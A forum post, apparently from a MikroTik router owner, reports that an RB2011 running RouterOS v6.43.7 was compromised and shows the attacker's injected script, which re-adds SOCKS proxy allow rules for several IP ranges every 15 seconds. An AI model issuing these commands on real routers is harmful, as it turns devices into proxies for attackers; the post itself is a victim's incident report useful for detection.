today i found my RB2011 been compromised using the same vulnerability and here is the photo attached.
this time they fitch a file from the internet which i do not what it is?
mean time the version is v6.43.7
the script added a file in the mikrotik and this it's content
in the attached photo you may see that this socks IPs are added more than 53000 times due to the script runs every 15 second.
Code: Select all
/ip socks access add src-address=184.108.40.206/15 action=allow /ip socks access add src-address=220.127.116.11/16 action=allow /ip socks access add src-address=18.104.22.168/16 action=allow /ip socks access add src-address=22.214.171.124/16 action=allow /ip socks access add src-address=0.0.0.0/0 action=deny